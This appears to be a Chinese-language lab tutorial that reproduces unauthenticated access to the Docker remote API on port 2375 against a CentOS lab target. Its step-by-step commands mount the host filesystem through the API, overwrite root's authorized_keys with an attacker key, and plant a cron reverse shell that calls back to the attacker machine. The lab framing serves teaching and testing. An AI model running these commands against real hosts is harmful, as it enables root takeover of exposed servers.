发布时间:2023-06-29 14:30
目录
一.Docker简介
二.Docker漏洞产生原因
三.Docker未授权漏洞复现
1.docker实验环境
2.漏洞复现
第一步,信息收集
第二步,访问2375端口
发现page not found(页面没有找到)代表json代表2375有存在漏洞
第三步,查看info目录
第四步,docker链接目标机器
编辑 第五步.docker未授权写ssh公钥得到shell:
编辑
第六步 ,ssh进行连接
四,docker未授权写定时任务获取shell
1.启动容器挂载到宿主机
2.kali开启监听
编辑
3.写入定时反弹shell
4.查看定时任务
5.获得目标shell
Docker 是一个开源的应用容器引擎,让开发者可以打包他们的应用以及依赖包到一个可移植的镜像中,然后发布到任何流行的 linux或Windows操作系统的机器上,也可以实现虚拟化。容器是完全使用沙箱机制,相互之间不会有任何接口。(Sandbox又叫沙箱、沙盘,即是一个虚拟系统程序,允许你在沙盘环境中运行浏览器或其他程序,因此运行所产生的变化可以随后删除)
因为docker赋有远程的远程控制,docker开放了一个tcp端口2375,如果没有限制访问的话,攻击者就会通过这个端口来通过docker未授权来获取服务器权限。
目标机器: CentOS7+Docker、IP:10.1.1.200
攻击机器:Kali+Docker、IP:10.1.1.100
虚拟机实验环境链接:https://www.hetianlab.com/expc.do?ec=ECIDcc41-1aa8-4db8-8f69-7e834b8aa17b
来源:合天网安实验室
nmap -p- -sV -T4 10.1.1.200
info一般指的是安全目录,通过安全目录查看docker消息
获取image
10.1.1.200:2375/images/json
通过docker -H参数连接目标docker
docker -H tcp://10.1.1.200 ps -a //列出所有容器
docker -H tcp://10.1.1.200 images //列出所有镜像
docker -H tcp://10.1.1.200 start 3dc8d67b679 //开启一个停止的容器
连接一个已经启动的容器:四种方法
docker - H tcp://10.1.1.200 exec -it 3dc8d67b679 bash
docker - H tcp://10.1.1.200 attach 3dc8d67b679(容器id)
docker -H tcp://10.1.1.200 run -it -v /:/mnt--entrypoint /bin/bash 4c9608fd76ba(镜像的id)
//mnt为挂载点 ----entrypoint是入口
docker -H tcp://10.1.1.200:2375 run -it -v /:/mnt busybox chroot /mnt sh //创建一个新的容器busybox容器,讲宿主机的磁盘挂载到容器
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba //启动一个容器,挂载宿主机的/mnt目录
ssh-keygen -t rsa //生成一个ssh公钥
cat /root/.ssh/id_rsa.pub //查看生成的公钥
讲公钥写到目标/root/.ssh/authorized_keys文件中
公钥内容:
echo "sshrsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC2ireX9ybOimMcML2K4gDqC4q0Gx7tgg1K6l4gYUHKQ/00a6O4l5cENirdgWrL/5S6Z/7LkVrxeQQKSKUjvk/3v+o3fE8ArdNLUbyGIDhsabuHLpgs5bT+HTrIegvymhMbftPnwYiR2GRZ+vNdQuIJjwD+nTQGR8ANOLSKNH0uIb1ZgOMcJC2IHIqtueC2t/MhY6Ot8mZnPCijeRfZean4AELfa2EJ0KZy1n68s1IJHJJuAo6+Ckf81dB1gnRtsm/5jp5YW/AEv9GfcrYv6+22hlFN2MAt1JH+iRPup/9joofCG/eSGEZmhPfjcPguhTOt4GqjqPVlPpWPSsGzjYnWpRrjJpVEdcoli9MaobCja/YtO1iN2SgLUUeMSRf+ysNHuvd5oOIpJBMYiGjY2pwZ45zEuqvI2P+zjCxVCYNhzVKNv+7FIaDLYZQPSMn9bYf6j0zhrvDuPWUkI0iaDTlf0Oq1nwesWDhJRIybWMfTjV+UdDxNvz2GiMKo73GLvhs= root@kali" > /mnt/root/.ssh/authorized_keys
>这个代表的意思为覆盖 所以在最后一句加入的意思是讲公钥内容覆盖到/mnt/root/.ssh/authorized_keys中
ssh root@10.1.1.200 -i id_rsa
docker -H tcp://10.1.1.200 run -it -v /:/mnt --entrypoint /bin/bash 4c9608fd76ba
nc -lvvp 1212 //监听1212端口
echo "* * * * * /bin/bash -i >& /dev/tcp/10.1.1.100/1212 0>&1" > /mnt/var/spool/cron/root
cat /mnt/var/spool/cron/root //查看写入到/mnt/var/spool/cron/root的任务
输入whoami查看用户
实验结束!!!